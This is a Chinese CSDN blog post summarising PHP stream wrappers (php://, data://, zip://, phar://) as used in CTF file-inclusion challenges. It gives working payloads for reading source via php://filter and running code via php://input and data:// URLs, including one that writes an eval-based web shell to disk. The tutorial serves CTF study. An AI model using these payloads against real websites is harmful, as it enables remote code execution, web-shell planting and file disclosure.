php伪协议总结

最新推荐文章于 2024-07-30 21:02:40 发布
最新推荐文章于 2024-07-30 21:02:40 发布
阅读量1.5k 收藏 11
点赞数
分类专栏: web安全 PHP 文章标签: php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45554491/article/details/127971872
版权

php伪协议总结

概述

PHP伪协议,也是php支持的协议和封装协议

常见的伪协议有:

php://		访问各个输入输出流
file://		访问本地文件系统
data://		获取数据(RFC 2397)
zip://		获取压缩流
phar://	PHP归档
http://		访问网址
zilb://		压缩流
ftp://		访问ftp
glob://		查找匹配的文件路径模式
ssh2://		secure shell 2
rar://		RAR
ogg://		音频流
expect://	处理交互式的流

主要协议适用场景要求请添加图片描述

1、php://协议

师傅们写的真不错
参考文章
参考文章

条件:
allow_url_fopen:off/on
allow_url_include :仅php://input php://stdin php://memory php://temp 需要on

作用:
php:// 访问各个输入/输出流(I/O streams),在CTF中经常使用的是php://filter和php://input,php://filter用于读取源码,php://input用于执行php代码。

说明
PHP 提供了一些杂项输入/输出(IO)流,允许访问 PHP 的输入输出流、标准输入输出和错误描述符,
内存中、磁盘备份的临时文件流以及可以操作其他读取写入文件资源的过滤器。

常用相关协议
php://filter

条件
需要开启 allow_url_fopen
用法
?file=php://filter/convert.base64-encode/resource=xx.php

?file=php://filter/read=convert.base64-encode/resource=xx.php

php://input

条件
allow_url_fopen=on/off
allow_url_include=on
用法
php://input + [POST DATA]执行php代码

http://127.0.0.1/include.php?filephp://input
[POST DATA]
<?php phpinfo(); ?>
若有写权限,可以写入一句话木马
http://127.0.0.1/include.php?file=php://input
[POST DATA]
<?php fputs(fopen('aaa.php','w'),'<?php @eval($_GET[cmd]); ?>'); ?>

file:\

条件
allow_url_fopen=on/off
allow_url_include=on/off 
用法

?file=file://C:\Windows\System32\drivers\etc\hosts
//读取本地文件

data://

条件
此协议需要在双on的情况下才能使用,很常用的数据流构造器,将读取后面base编码字符串后解码的数据作为数据流的输入

用法
data://text/plain;base64,base64编码字符 
http://127.0.0.1/cmd.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

data://text/plain,字符 
http://127.0.0.1/cmd.php?file=data://text/plain,<?php phpinfo()?> plain后写要传入的内容。

zip://

条件
allow_url_fopen和allow_url_include的启用与否无关系

用法
zip:// [压缩文件绝对路径]#[压缩文件内的子文件名]
?file=zip://D:\phpstudy\WWW\x.zip%23shell.php

phar://

条件
allow_url_fopen和allow_url_include的启用与否无关系
php版本大于等于5.3.0
用法

phar://压缩包名/内部文件名
?file=phar://D:\phpstudy\WWW\x.zip/shell.php

还有其他的压缩包协议
参考链接

小镇航海家
关注
  • 0
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP伪协议总结
weixin_40950781的博客
09-11 539
PHP伪协议总结0x00 file:// 协议0x01 PHP://协议0x02 zip:// & bzip2:// & zlib:// 协议0x04 data://协议0x05 http:// 和 https://协议0x06 phar://协议 本文主要对PHP伪协议进行总结,重点不再放在操作上,操作实例请看:https://blog.csdn.net/weixin_40950...
[CTF_网络安全] 攻防世界 Web_php_include 解题详析(php伪协议、data伪协议、file伪协议)
2401_84208172的博客
05-24 1301
[CTF_网络安全] 攻防世界 Web_php_include 解题详析(php伪协议、data伪协议、file伪协议),该题考察文件包含漏洞,涉及PHP伪协议data伪协议file伪协议PHP内置函数等知识点,希望读者躬身实践。黑客&网络安全如何学习。
php伪协议漏洞_PHP伪协议总结
weixin_39658019的博客
01-17 189
参考了这篇文章:php伪协议实现命令执行的七种姿势,并根据自己理解进行了总结,也算是加深一下印象,方便以后使用。file:// 协议条件:allow_url_fopen:off/onallow_url_include :off/on作用:用于访问本地文件系统,在CTF中通常用来读取本地文件的且不受allow_url_fopen与allow_url_include的影响。include()/requ...
CTF中常用的php伪协议总结
Y4tacker的博客
08-04 8125
文章目录总览file://php://php://filterphp://inputdata://参考文章 总览 php:// — 访问各个输入/输出流(I/O streams) file:// — 访问本地文件系统 phar:// — PHP 归档 zlib:// — 压缩流 data:// — 数据(RFC 2397) http:// — 访问 HTTP(s) 网址 ftp:// — 访问 FTP(s) URLs glob:// — 查找匹配的文件路径模式 ssh2:// — Secure Shell
PHP伪协议
m0_75178803的博客
04-02 1175
可以获取指定文件源码。当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,让其不执行,从而导致任意文件读取协议参数:常用的有。
PHP伪协议详解
Python老吕的博客
03-06 2064
PHP伪协议PHP自己支持的一种协议与封装协议,简单来说就是PHP定义的一种特殊访问资源的方法。有些伪协议成功执行需要allow_url_fopen和allow_url_include的支持。allow_url_fopen On/Off 允许或禁止打开URL文件allow_url_include On/Off 允许或禁止引用URL文件。
文件包含时涉及PHP伪协议总结
qq_43256965的博客
05-14 1140
在做CTF题的时候文件包含题出现多次使用伪协议,学习了下伪协议就顺便写个博客防止以后忘记PHP伪协议总结温故而知新,宁静以致远。
php伪协议 过滤,[WEB安全]PHP伪协议总结
weixin_39928003的博客
03-19 168
0x01 简介首先来看一下有哪些文件包含函数:include、require、include_once、require_once、highlight_fileshow_source 、readfile 、file_get_contents 、fopen 、file有哪些伪协议:file:// — 访问本地文件系统http:// — 访问 HTTP(s) 网址ftp:// — 访问 FTP(s) U...
php常见伪协议总结
m0_57236802的博客
01-18 738
PHP中的伪协议(也称为流包装器)是一种特殊的流访问机制,它允许访问各种类型的资源,如文件、网络资源、压缩文件等。
php为协议 ctf,CTF中常用的php伪协议总结
weixin_42533910的博客
04-02 612
php:// — 访问各个输入/输出流(I/O streams)file:// — 访问本地文件系统phar:// — PHP 归档zlib:// — 压缩流data:// — 数据(RFC 2397)http:// — 访问 HTTP(s) 网址ftp:// — 访问 FTP(s) URLsglob:// — 查找匹配的文件路径模式ssh2:// — Secure Shell 2rar:// —...
PHP 伪协议总结.docx
02-24
在探讨PHP伪协议之前,我们先来了解下何为“伪协议”。伪协议(pseudo-protocol)指的是由PHP内部实现的特定协议,它们允许开发者通过简单的字符串指定的方式访问各种不同的资源,如文件系统、输入输出流等。这种...
php伪协议概述.pdf
02-24
### PHP伪协议详解 #### 一、概述 PHP伪协议是一种独特的URL协议,主要用于在PHP环境中执行文件操作。与传统的文件路径访问不同,伪协议允许开发者通过构建特定格式的URL来实现对文件的读取、写入等操作,极大地...
PHP伪协议相关 -.pdf
02-24
### PHP伪协议相关知识点 #### 一、PHP伪协议简介 在PHP中,伪协议(pseudo-protocol)是一种特殊的协议,允许用户通过特定的语法结构访问文件或执行其他操作,而无需实际的网络请求。这些伪协议主要用于简化本地...
php伪协议.pdfphp伪协议.pdfphp伪协议.pdf
02-24
### PHP 伪协议详解 #### 一、概览 PHP 伪协议是一种特殊的 URL 格式,用于在 PHP 代码中执行特定的操作。这些伪协议主要用于处理文件读取、网络请求以及数据处理等方面。理解并恰当地使用 PHP 伪协议对于开发安全...
解决CodeIgniter伪静态失效
11-03
总结来说,解决CodeIgniter伪静态失效的问题通常需要两步:一是正确配置Apache的`.htaccess`文件以实现URL重写,二是确保CodeIgniter的`uri_protocol`设置适应这种重写方式。在遇到类似问题时,检查和调整这两个方面...
RCE和php文件上传
最新发布
m0_71332744的博客
07-30 881
在网络安全领域,远程命令执行(RCE)和文件上传漏洞是两种常见的攻击方式。本文将带大家深入了解这两种漏洞的原理、利用方法以及如何进行有效防御。
53、PHP 实现归并排序
weixin_44010641的博客
07-30 367
【代码】53、PHP 实现归并排序。
这款ERP云进销存系统,直接封神
魔法标记
07-29 850
一套用php写的ERP云进销存系统,快速部署,直接使用,简直是小公司和个体户的神器。
php伪协议常用代码
08-05
常用的PHP伪协议代码包括: 1. 使用php://input执行PHP代码:这种方法可以通过将PHP代码作为POST数据传递,然后使用php://input伪协议来执行代码。例如,可以使用以下代码来执行phpinfo()函数并将结果输出到页面上...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值